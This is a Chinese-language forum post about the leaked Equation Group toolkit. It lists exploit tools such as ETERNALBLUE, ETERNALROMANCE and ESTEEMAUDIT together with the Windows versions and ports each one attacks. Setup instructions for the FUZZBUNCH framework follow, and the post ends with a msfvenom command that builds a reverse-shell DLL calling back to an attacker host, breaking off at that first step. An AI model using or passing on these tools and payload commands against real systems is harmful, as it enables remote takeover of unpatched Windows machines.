|
GitHub:https://github.com/x0rz/EQGRP_Lost_in_Translation
Start.jar //图形界面
EXPLODINGCAN 是 IIS 6.0 远程漏洞利用工具
ETERNALROMANCE 是 SMB1 的重量级利用,可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限。
除此之外 ERRATICGOPHER 、ETERNALBLUE 、ETERNALSYNERGY 、ETERNALCHAMPION 、EDUCATEDSCHOLAR、 EMERALDTHREAD 等都是 SMB 漏洞利用程序,可以攻击开放了 445 端口的 Windows 机器。
ESTEEMAUDIT 是 RDP 服务的远程漏洞利用工具,可以攻击开放了3389 端口的 Windows 机器。
FUZZBUNCH 是一个类似 MetaSploit 的漏洞利用平台。
ODDJOB 是无法被杀毒软件检测的 Rootkit 利用工具。
ECLIPSEDWING 是 Windows 服务器的远程漏洞利用工具。
ESKIMOROLL 是 Kerberos 的漏洞利用攻击,可以攻击 Windows 2000/2003/2008/2008 R2 的域控制器。
Explodingcan IIS漏洞利用工具,只对Windows 2003有影响
Eternalromance SMB 和 NBT漏洞利用工具,影响端口139和445
Emphasismine 通过IMAP漏洞攻击,攻击的默认端口为143
Englishmansdentist 通过SMTP漏洞攻击,默认端口25
Erraticgopher 通过RPC漏洞攻击,端口为445
Eskimoroll 通过kerberos漏洞进行攻击,默认攻击端口88
Eclipsedwing MS08-67漏洞利用工具
Educatedscholar MS09-050漏洞利用工具
Emeraldthread MB和 Netbios 漏洞利用工具,使用445端口和 139端口
Zippybeer SMTP漏洞利用工具,默认端口 445
Eternalsynergy SMB漏洞利用工具,默认端口 445
Esteemaudit RDP漏洞利用工具,默认攻击端口为3389
使用方法:
注意,必须安装32位python2.6相关版本,其他版本不奏效。
下载python2.6并安装
下载pywin32并安装
将C:\Python26添加到环境变量PATH中。
修改\windows\fb.py
注释掉:
[mw_shl_code=python,true] #addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)[/mw_shl_code]
将windows\lib\x86-Windows | x64-Windows 加入到系统环境变量
1.生成dll命令:
[mw_shl_code=python,true]msfvenom -p windows/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=8888 -f dll > shell.dl[/mw_shl_code] |
|